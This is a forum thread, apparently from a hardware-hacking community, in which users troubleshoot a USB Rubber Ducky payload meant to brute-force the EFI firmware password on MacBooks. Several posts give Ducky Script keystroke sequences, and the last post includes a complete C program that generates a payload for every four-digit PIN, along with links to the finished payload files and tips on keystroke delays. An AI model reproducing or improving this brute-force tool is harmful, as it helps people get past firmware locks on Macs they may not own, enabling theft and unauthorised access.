emZe Posted April 22, 2014 Share Posted April 22, 2014 Hi all, i bought a rubber ducky recently for bypass the EFI password like Teensy 3 https://www.youtube.com/watch?v=xXMiX-Bybsw But when typing the password, just type 1 ore 2 dot in the password case and after type enter, sometimes make nothing... anyone know the issue for that? Thanks in advance. Sorry for my bad english because i'm from belgium... Quote Link to comment Share on other sites More sharing options...
Guest spazi Posted April 22, 2014 Share Posted April 22, 2014 (edited) Hi emZe, welcome to the forums! Can you share the payload you are using? Darren made a similar payload for brute forcing android pins couple of months ago. Hak5 made a video about it on the Hak5 youtube channel. You should look into that :) www.youtube.com/watch?feature=player_detailpage&v=yoYiEkk5TyI how long are the mac EFI pin number? It's typically 4 numbers, right? Do you know if there are any max attempts and if there are any time/wait penalties? Edited April 22, 2014 by spazi Quote Link to comment Share on other sites More sharing options...
emZe Posted April 22, 2014 Author Share Posted April 22, 2014 Hi emZe, welcome to the forums! Can you share the payload you are using? Darren made a similar payload for brute forcing android pins couple of months ago. Hak5 made a video about it on the Hak5 youtube channel. You should look into that :) www.youtube.com/watch?feature=player_detailpage&v=yoYiEkk5TyI how long are the mac EFI pin number? It's typically 4 numbers, right? Do you know if there are any max attempts and if there are any time/wait penalties? Hi, Thanks for your help... The payload i use is http://pastebin.com/4x53pkya i've used many many many others and always the same... now i test a small one with delay between all numbers and the problem is here too DELAY 5000 STRING 1 DELAY 1000 STRING 1 DELAY 1000 STRING 1 DELAY 1000 STRING 1 DELAY 5000 ENTER DELAY 1000 STRING 1 DELAY 1000 STRING 1 DELAY 1000 STRING 1 DELAY 1000 STRING 1 DELAY 5000 ENTER DELAY 1000 STRING 1 DELAY 1000 STRING 1 DELAY 1000 STRING 1 DELAY 1000 STRING 1 DELAY 5000 ENTER DELAY 1000 STRING 1 DELAY 1000 STRING 1 DELAY 1000 STRING 1 DELAY 1000 STRING 1 I think is 4 digits but some peoples say is 6 digits now for mbp a1286 late 2010. no penalties, no attempts. Regards Quote Link to comment Share on other sites More sharing options...
Guest spazi Posted April 22, 2014 Share Posted April 22, 2014 I noticed that the script on pastebin has two ENTER commands sometimes. Maybe they shouldn't be there considering that this is a mac EFI you are trying to bruteforce.I noticed that there is plenty of delays. That's always nice. maybe you should try writing your own script, without the time penalty delays.Not sure why it won't work, maybe it's a keyboard thing? the Rubber Ducky is cross platform compliant, so it should work. Are you saying that the rubber ducky is only typing one or two numbers and then nothing happens? Quote Link to comment Share on other sites More sharing options...
emZe Posted April 22, 2014 Author Share Posted April 22, 2014 i've tested with one enter in notepad no problem, all is ok but in efi password prompt have problem i've tested with macosx keyboard vidpid and is the same... the teensy is better than rubber ducky?? Quote Link to comment Share on other sites More sharing options...
Guest spazi Posted April 22, 2014 Share Posted April 22, 2014 (edited) the teensy is better than rubber ducky?? I have never tried the teensy, so I can't say. It's probably a great tool though :) I have never had any problems with the rubber ducky and I've used several payloads on different scenarios. I've tested it against, OSX, Linux, Windows 7, Ipad IOS, Ipod IOS and android. Maybe I'm just lucky. Edited April 22, 2014 by spazi Quote Link to comment Share on other sites More sharing options...
emZe Posted April 23, 2014 Author Share Posted April 23, 2014 maybe it's the speed of keypress? it's possible to change the keypress delay? for example, for 1234 : press "1" for 500ms release 500ms press "2" for 500ms release 500ms ..... .... you know? Quote Link to comment Share on other sites More sharing options...
dataghost Posted January 5, 2015 Share Posted January 5, 2015 maybe it's the speed of keypress? it's possible to change the keypress delay? for example, for 1234 : press "1" for 500ms release 500ms press "2" for 500ms release 500ms ..... .... you know? Would you know how to create this script to have the delay between the numbers it's the issue for sure Quote Link to comment Share on other sites More sharing options...
belly Posted February 22, 2015 Share Posted February 22, 2015 hey, i wrote a small c program to generate a textfile that i translate via online-encoder.#include<stdio.h>int main() { FILE *datei; datei = fopen("test.txt", "w"); if (datei == NULL) { printf("Fehler beim oeffnen der Datei."); return 1; } fprintf(datei, "DELAY 5000\n"); int i; for(i=0; i<10; i++) { fprintf(datei, "STRING 0\nDELAY 700\nSTRING 0\nDELAY 700\nSTRING 0\nDELAY 700\nSTRING %i\nDELAY 700\nENTER\nDELAY 12500\n", i); } for(i=10; i<100; i++) { fprintf(datei, "STRING 0\nDELAY 500\nSTRING 0\nDELAY 500\nSTRING %i\nDELAY 1500\nENTER\nDELAY 7500\n", i); } for(i=100; i<1000; i++) { fprintf(datei, "STRING 0\nDELAY 500\nSTRING %i\nDELAY 1500\nENTER\nDELAY 7500\n", i); } for(i=1000; i<10000; i++) { fprintf(datei, "STRING %i\nDELAY 1500\nENTER\nDELAY 7500\n", i); } fclose(datei); return 0; } what i realized too is that you have to put in digit by digit, STRING 0001 ENTER is way too fast! I keep playing around with the different delays, by now my payload is able to run about two hours broodforcing an mbair but then something seems to go wrong cauz it only enters three digits after running two hours... i also realized theres differences between a macbook retina and a macbook air. i attached the .txt and .bin of my payload - if anyone is in intrested or has an idea i would love to figure out whats the problem! and a small video of the stick of the ducky starting to attack^^ https://www.facebook.com/video.php?v=10204806167131861&set=vb.1168804757&type=3&theater so long, belly payload (txt): http://www47.zippyshare.com/v/tXyo9I7o/file.html payload (bin): http://www47.zippyshare.com/v/8OKsSeUy/file.html Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.